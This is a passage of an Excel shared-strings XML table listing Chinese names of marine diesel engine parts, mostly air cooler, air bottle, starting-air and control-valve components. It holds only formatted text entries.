    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器化学清洗布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器化学清洗管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器化学清洗和热水清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器化学清洗混合柜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器化学清洗说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器技术数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体，后部加工图</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>--</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体绝缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器框架板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器框架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首端，焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器框架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首端，机械加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器冷却水管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器冷却水管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器冷却水进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器冷却水支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洁工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洁管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洁幕</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洁气枪</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洁装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗入口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗主管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>台增压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗主管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>台增压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器吸入口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器箱补充图纸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器泄放管漏斗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器芯体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器一览表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器座</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气，燃气系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气粗滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气电机壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气定位装置布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气分配器驱动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气分配室填料</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气干燥</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气缸悬吊</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气缸用管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气管节流器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气回转马达壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气控制单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气冷却清洁单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气连接管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气密封盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气密封管支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气旁通阀组合布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气瓶</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气瓶</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气瓶布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气瓶壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气瓶气压计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气起动管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气起动器安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气起动器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气驱动的液压泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气润滑器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气室的盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气室盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气调整螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气压力计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气压力调节器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气用管，排气阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空心尖头螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制边缘，柱塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制电机装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制电缆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制阀安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制阀出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制阀的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制阀管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制阀进口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制阀座研磨杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制和安全空气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制和安全系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制活塞用起吊气缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制机构</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制机构，工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气，切断充气空气</t>
    </r>
